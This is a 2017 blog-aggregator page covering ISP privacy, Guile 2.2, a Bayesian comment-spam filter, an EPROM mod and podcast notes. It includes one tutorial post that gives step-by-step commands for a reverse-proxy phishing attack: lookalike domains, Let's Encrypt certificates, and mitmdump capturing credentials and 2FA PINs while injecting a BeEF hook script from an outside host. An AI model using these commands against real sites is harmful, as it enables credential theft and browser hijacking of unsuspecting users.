As the gatekeeper to the network the ISP can see and read the URLs of all the pages you visit. If the site connection is via HTTPs then only the domain you are visiting is exposed – a minor mitigation but another good reason to use HTTPs Everywhere.

There are two technical responses to this situation both of which are unsatisfactory.

Tor: if you use Tor to access the web then your traffic is encrypted and routed via a series of other servers before being reaching the destination website. Thus the traffic is concealed from the ISP but at the cost of performance – all that circumnavigation to get your request to its final destination slows down the process. If it sounds too technical for you, think again: the Tor browser requires zero configuration overhead.

VPN: if you use a virtual private network then all your web traffic is routed securely through another server, so the ISP can only observe you connecting to that resource. That’s great but VPNs are paid services, typically between $30 and $100 a year. If you use a VPN for this purpose you hope that they are more trustworthy than the ISP, but the VPN world is fragmented among small providers and has no consistent audit standard.


by nonrival

March 31, 2017

Chokepoint

Reverse proxy phishing with valid certificates

Introduction

This is going to be a quick down and dirty post on how to effectively create cloned websites on the fly by using mitmdump and letsencrypt for valid certificates. We'll use a reverse proxy in front of a site in order to create very convincing and advanced phishing campaign. This is a great way to capture two factor authentication pins and attempt automatic VPN logins.

Acquire a domain

There are plenty of different approaches when it comes to acquiring a domain for your phish. Ideally, you will want it to be very similar to your target. Alternative TLDs are an easy way to make convincing phishing attacks. You may also look into recently expired domains that can be acquired. For this tutorial, I'm going to set up blog.chokepoint.net instead of purchasing a domain for demonstration sake, and demonstrate a phish by setting up a reverse proxy for shodan.io.

CatMyFish is an excellent tool that relies on expireddomains.net in order to find potential expired domains.

Lets Encrypt!

Let's encrypt is a free, automated, and open CA that's available to anyone that owns a domain or subdomain. They have done a lot of work in helping to create secure connections for millions of websites. While they provide a great and legitimate service, it's often abused by criminals and red teams as well. Certbot is a cross platform tool for validating that you do indeed own a domain prior to issuing any certificates.

Download certbot


$ wget https://dl.eff.org/certbot-auto
$ chmod a+x certbot-auto
$ ./certbot-auto

Now simply run the following command, and choose "Spin up a temporary webserver (standalone)"


$ ./certbot-auto certonly

Follow the prompts for your e-mail address and domain as appropriate. Your certificates will be placed in /etc/letsencrypt/live/site.domain.here. In order to prepare the certificates for use with out reverse proxy MITM attack, simply concatenate the private key and fullchain certificates into one file.


$ sudo cat /etc/letsencrypt/live/blog.chokepoint.net/privkey.pem /etc/letsencrypt/live/blog.chokepoint.net/fullchain.pem > blog.chokepoint.net.pem

Download latest mitmproxy

Mitmproxy recently went through some large upgrade that may not have made it into your distribution's repository list yet. We'll go ahead and grab 0.18.2 using pip, as some features regarding the certificates seem to be broken in 2.* versions.


$ sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
$ sudo pip3 install mitmproxy==0.18.2

Execute reverse proxy attack


$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.pem -w blog.log
Notice how the URL bar has the green Secure logo and all.

Going Beyond

Here are two scripts that will help in dumping credentials as well as an example script for injecting BEEF hooks into sessions passing through the MITM.

Dumping credentials

Beef injection

Running scripts

In order to execute scripts, use the -s option in mitmdump. For example:

$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.pem -s ./dump_creds.py -w blog.log

$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.pem -w blog.log -s "beef_injector.py http://beef.chokepoint.net:3000/hook.js"

by stderr (noreply@blogger.com)

March 27, 2017

Data Knightmare

DataKnightmare 1x24 - 95 tesi per il mondo immateriale

Oggi leggiamo le "95 tesi per il mondo immateriale" di JM Porup, giornalista investigativo statunitense. Ventun anni dopo la visione romantica della "Dichiarazione di Indipendenza del Ciberspazio" di John Barlow, Porup ci mette di fronte alla realtà di ciò che Internet è realmente diventata: uno strumento di sorveglianza e dominio coloniale globali.

by Runtime Radio

March 26, 2017

Evgeny Morozov

By dismantling domestic privacy laws, the US will lose control of the global internet

If Donald Trump signs off changes, he weakens America’s ‘global village’ role

The numerous paradoxes that will haunt Donald Trump in the coming months were on full display during the recent Senate vote to undo privacy legislation that was passed in the last few years of the Obama administration.

As part of a broader effort to treat internet service providers and telecoms operators as utility companies, Obama imposed restrictions on what these companies could do with all the user data from browsers and apps. Emboldened by Trump, the Republicans have just allowed these businesses to collect, sell and manipulate such data without user permission.

Continue reading...

by Evgeny Morozov

March 24, 2017

videogame confessional forum

joe bond

Okay, sounds good. My name is Joe Bond. I live in Northern Virginia. I work as a firefighter/paramedic. I've been doing that for about 10 years now. So, that, basically, has nothing to do with...

by david wolinsky

March 21, 2017

Data Knightmare

DataKnightmare 1x23 - Benvenuti a GATTACA

Il congresso USA ha presentato una legge che consente alle aziende di richiedere test genetici ai dipendenti --e di disporre dei dati. Questo consentirebbe alle aziende di discriminare i dipendenti in base al profilo genetico. Forse gli USA non hanno imparato molto, dagli anni della segregazione razziale; ma l'Europa ricorda ancora i lager? Siamo sicuri che nessuno oserebbe presentare una legge simile da noi?

by Runtime Radio

March 15, 2017

Andy Wingo

guile 2.2 omg!!!

Oh, good evening my hackfriends! I am just chuffed to share a thing with yall: tomorrow we release Guile 2.2.0. Yaaaay!

I know in these days of version number inflation that this seems like a very incremental, point-release kind of a thing, but it's a big deal to me. This is a project I have been working on since soon after the release of Guile 2.0 some 6 years ago. It wasn't always clear that this project would work, but now it's here, going into production.

In that time I have worked on JavaScriptCore and V8 and SpiderMonkey and so I got a feel for what a state-of-the-art programming language implementation looks like. Also in that time I ate and breathed optimizing compilers, and really hit the wall until finally paging in what Fluet and Weeks were saying so many years ago about continuation-passing style and scope, and eventually came through with a solution that was still CPS: CPS soup. At this point Guile's "middle-end" is, I think, totally respectable. The backend targets a quite good virtual machine.

The virtual machine is still a bytecode interpreter for now; native code is a next step. Oddly my journey here has been precisely opposite, in a way, to An incremental approach to compiler construction; incremental, yes, but starting from the other end. But I am very happy with where things are. Guile remains very portable, bootstrappable from C, and the compiler is in a good shape to take us the rest of the way to register allocation and native code generation, and performance is pretty ok, even better than some natively-compiled Schemes.

For a "scripting" language (what does that mean?), I also think that Guile is breaking nice ground by using ELF as its object file format. Very cute. As this seems to be a "Andy mentions things he's proud of" segment, I was also pleased with how we were able to completely remove the stack size restriction.

high fives all around

As is often the case with these things, I got the idea for removing the stack limit after talking with Sam Tobin-Hochstadt from Racket and the PLT group. I admire Racket and its makers very much and look forward to stealing fromworking with them in the future.

Of course the ideas for the contification and closure optimization passes are in debt to Matthew Fluet and Stephen Weeks for the former, and Andy Keep and Kent Dybvig for the the latter. The intmap/intset representation of CPS soup itself is highly endebted to the late Phil Bagwell, to Rich Hickey, and to Clojure folk; persistent data structures were an amazing revelation to me.

Guile's virtual machine itself was initially heavily inspired by JavaScriptCore's VM. Thanks to WebKit folks for writing so much about the early days of Squirrelfish! As far as the actual optimizations in the compiler itself, I was inspired a lot by V8's Crankshaft in a weird way -- it was my first touch with fixed-point flow analysis. As most of yall know, I didn't study CS, for better and for worse; for worse, because I didn't know a lot of this stuff, and for better, as I had the joy of learning it as I needed it. Since starting with flow analysis, Carl Offner's Notes on graph algorithms used in optimizing compilers was invaluable. I still open it up from time to time.

While I'm high-fiving, large ups to two amazing support teams: firstly to my colleagues at Igalia for supporting me on this. Almost the whole time I've been at Igalia, I've been working on this, for about a day or two a week. Sometimes at work we get to take advantage of a Guile thing, but Igalia's Guile investment mainly pays out in the sense of keeping me happy, keeping me up to date with language implementation techniques, and attracting talent. At work we have a lot of language implementation people, in JS engines obviously but also in other niches like the networking group, and it helps to be able to transfer hackers from Scheme to these domains.

I put in my own time too, of course; but my time isn't really my own either. My wife Kate has been really supportive and understanding of my not-infrequent impulses to just nerd out and hack a thing. She probably won't read this (though maybe?), but it's important to acknowledge that many of us hackers are only able to do our work because of the support that we get from our families.

a digression on the nature of seeking and knowledge

I am jealous of my colleagues in academia sometimes; of course it must be this way, that we are jealous of each other. Greener grass and all that. But when you go through a doctoral program, you know that you push the boundaries of human knowledge. You know because you are acutely aware of the state of recorded knowledge in your field, and you know that your work expands that record. If you stay in academia, you use your honed skills to continue chipping away at the unknown. The papers that this process reifies have a huge impact on the flow of knowledge in the world. As just one example, I've read all of Dybvig's papers, with delight and pleasure and avarice and jealousy, and learned loads from them. (Incidentally, I am given to understand that all of these are proper academic reactions :)

But in my work on Guile I don't actually know that I've expanded knowledge in any way. I don't actually know that anything I did is new and suspect that nothing is. Maybe CPS soup? There have been some similar publications in the last couple years but you never know. Maybe some of the multicore Concurrent ML stuff I haven't written about yet. Really not sure. I am starting to see papers these days that are similar to what I do and I have the feeling that they have a bit more impact than my work because of their medium, and I wonder if I could be putting my work in a more useful form, or orienting it in a more newness-oriented way.

I also don't know how important new knowledge is. Simply being able to practice language implementation at a state-of-the-art level is a valuable skill in itself, and releasing a quality, stable free-software language implementation is valuable to the world. So it's not like I'm negative on where I'm at, but I do feel wonderful talking with folks at academic conferences and wonder how to pull some more of that into my life.

In the meantime, I feel like (my part of) Guile 2.2 is my master work in a way -- a savepoint in my hack career. It's fine work; see A Virtual Machine for Guile and Continuation-Passing Style for some high level documentation, or many of these bloggies for the nitties and the gritties. OKitties!

getting the goods

It's been a joy over the last two or three years to see the growth of Guix, a packaging system written in Guile and inspired by GNU stow and Nix. The laptop I'm writing this on runs GuixSD, and Guix is up to some 5000 packages at this point.

I've always wondered what the right solution for packaging Guile and Guile modules was. At one point I thought that we would have a Guile-specific packaging system, but one with stow-like characteristics. We had problems with C extensions though: how do you build one? Where do you get the compilers? Where do you get the libraries?

Guix solves this in a comprehensive way. From the four or five bootstrap binaries, Guix can download and build the world from source, for any of its supported architectures. The result is a farm of weirdly-named files in /gnu/store, but the transitive closure of a store item works on any distribution of that architecture.

This state of affairs was clear from the Guix binary installation instructions that just have you extract a tarball over your current distro, regardless of what's there. The process of building this weird tarball was always a bit ad-hoc though, geared to Guix's installation needs.

It turns out that we can use the same strategy to distribute reproducible binaries for any package that Guix includes. So if you download this tarball, and extract it as root in /, then it will extract some paths in /gnu/store and also add a /opt/guile-2.2.0. Run Guile as /opt/guile-2.2.0/bin/guile and you have Guile 2.2, before any of your friends! That pack was made using guix pack -C lzip -S /opt/guile-2.2.0=/ guile-next glibc-utf8-locales, at Guix git revision 80a725726d3b3a62c69c9f80d35a898dcea8ad90.

(If you run that Guile, it will complain about not being able to install the locale. Guix, like Scheme, is generally a statically scoped system; but locales are dynamically scoped. That is to say, you have to set GUIX_LOCPATH=/opt/guile-2.2.0/lib/locale in the environment, for locales to work. See the GUIX_LOCPATH docs for the gnarlies.)

Alternately of course you can install Guix and just guix package -i guile-next. Guix itself will migrate to 2.2 over the next week or so.

Welp, that's all for this evening. I'll be relieved to push the release tag and announcements tomorrow. In the meantime, happy hacking, and yes: this blog is served by Guile 2.2! :)

by Andy Wingo

March 13, 2017

Data Knightmare

DataKnightmare 1x22 - Fake news tu' sorella

Facebook si muove contro le fake news. Con una mossa abile, affida ad altri il compito che gli spetterebbe. Purtroppo, questa soluzione è sbagliata e controproducente: benvenuti all'alba della censura online.

by Runtime Radio

March 10, 2017

videogame confessional forum

celia pearce

I'll just give you a short snapshot of me. I have a day job as a college professor. I am an associate professor of game design at Northeastern University, which is located in Boston. That's my day...

by david wolinsky

March 07, 2017

Data Knightmare

DataKnightmare 1x21 - La posta in gioco

A parole nessuno vuole controllare la rete. Eppure l'industria del copyright, la politica e i giganti di Internet si muovono tutti in quella direzione --ovviamente per proteggere gli innocenti. Cosa c'è veramente in gioco?

by Runtime Radio

March 06, 2017

Andy Wingo

it's probably spam

Greetings, peoples. As you probably know, these words are served to you by Tekuti, a blog engine written in Scheme that uses Git as its database.

Part of the reason I wrote this blog software was that from the time when I was using Wordpress, I actually appreciated the comments that I would get. Sometimes nice folks visit this blog and comment with information that I find really interesting, and I thought it would be a shame if I had to disable those entirely.

But allowing users to add things to your site is tricky. There are all kinds of potential security vulnerabilities. I thought about the ones that were important to me, back in 2008 when I wrote Tekuti, and I thought I did a pretty OK job on preventing XSS and designing-out code execution possibilities. When it came to bogus comments though, things worked well enough for the time. Tekuti uses Git as a log-structured database, and so to delete a comment, you just revert the change that added the comment. I added a little security question ("what's your favorite number?"; any number worked) to prevent wordpress spammers from hitting me, and I was good to go.

Sadly, what was good enough in 2008 isn't good enough in 2017. In 2017 alone, some 2000 bogus comments made it through. So I took comments offline and painstakingly went through and separated the wheat from the chaff while pondering what to do next.

an aside

I really wondered why spammers bothered though. I mean, I added the rel="external nofollow" attribute on links, which should prevent search engines from granting relevancy to the spammer's links, so what gives? Could be that all the advice from the mid-2000s regarding nofollow is bogus. But it was definitely the case that while I was adding the attribute to commenter's home page links, I wasn't adding it to links in the comment. Doh! With this fixed, perhaps I will just have to deal with the spammers I have and not even more spammers in the future.

i digress

I started by simply changing my security question to require a number in a certain range. No dice; bogus comments still got through. I changed the range; could it be the numbers they were using were already in range? Again the bogosity continued undaunted.

So I decided to break down and write a bogus comment filter. Luckily, Git gives me a handy corpus of legit and bogus comments: all the comments that remain live are legit, and all that were ever added but are no longer live are bogus. I wrote a simple tokenizer across the comments, extracted feature counts, and fed that into a naive Bayesian classifier. I finally turned it on this morning; fingers crossed!

My trials at home show that if you train the classifier on half the data set (around 5300 bogus comments and 1900 legit comments) and then run it against the other half, I get about 6% false negatives and 1% false positives. The feature extractor interns sequences of 1, 2, and 3 tokens, and doesn't have a lower limit for number of features extracted -- a feature seen only once in bogus comments and never in legit comments is a fairly strong bogosity signal; as you have to make up the denominator in that case, I set it to indicate that such a feature is 99.9% bogus. A corresponding single feature in the legit set without appearance in the bogus set is 99% legit.

Of course with this strong of a bias towards precise features of the training set, if you run the classifier against its own training set, it produces no false positives and only 0.3% false negatives, some of which were simply reverted duplicate comments.

It wasn't straightforward to get these results out of a Bayesian classifier. The "smoothing" factor that you add to both numerator and denominator was tricky, as I mentioned above. Getting a useful tokenization was tricky. And the final trick was even trickier: limiting the significant-feature count when determining bogosity. I hate to cite Paul Graham but I have to do so here -- choosing the N most significant features in the document made the classification much less sensitive to the varying lengths of legit and bogus comments, and less sensitive to inclusions of verbatim texts from other comments.

We'll see I guess. If your comment gets caught by my filters, let me know -- over email or Twitter I guess, since you might not be able to comment! I hope to be able to keep comments open; I've learned a lot from yall over the years.

by Andy Wingo

March 03, 2017

Museo dell Informatica funzionante

TOP2004 EPROM programmer: a simple mod!

Some time ago we expained how we fixed our EPROM programmer TOP2004. We saw that if we plug some BAD EPROM into the socket, the current peak at Vpp pin is too high and able to burn the switching Vpp transistor in the programmer. A bad EPROM like that is also quite hot so somehow you can touch it to check if it’s good or not.

Max current for Vpp switching transistors (MMBT3906) is 200mA; rarely we saw an EPROM in need of more than 100mA on the Vpp.

So we decided to mod our EPROM programmer, to protect it from bad EPROMS… we just cut the Vpp trace, and added a FUSE SOCKET for 100mA fuses, to protect it. Simple and effective!

L'articolo TOP2004 EPROM programmer: a simple mod! sembra essere il primo su Museo dell'Informatica Funzionante.

by asbesto